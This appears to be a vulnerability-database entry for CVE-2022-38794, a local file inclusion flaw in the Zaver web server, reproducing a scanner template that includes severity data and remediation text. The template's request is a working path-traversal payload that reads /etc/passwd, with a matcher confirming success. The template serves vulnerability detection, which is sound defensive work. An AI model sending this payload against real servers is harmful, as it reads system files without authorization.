CVE-2022-38794: Zaver - Local File Inclusion

2025-08-01 Zaver PoC Public

Description

Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.

PoC

id: CVE-2022-38794

info:
  name: Zaver - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    Zaver through 2020-12-15  is vulnerable to local file inclusion via the GET /.. substring.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: |
    To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations.
  reference:
    - https://github.com/zyearn/zaver/issues/22
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38794
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-38794
    cwe-id: CWE-22
    epss-score: 0.03928
    epss-percentile: 0.89829
    cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zaver_project
    product: zaver
  tags: cve,cve2022,lfi,zaver,zaver_project,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/../../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402201df374b001e402f34c88eabfda5b223e5fc55634f258ecff4dd34a518daa97d9022045e3e24275e14665b862b1c4ce078cff015a517d6bec30e6e4579654d73eaa24:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities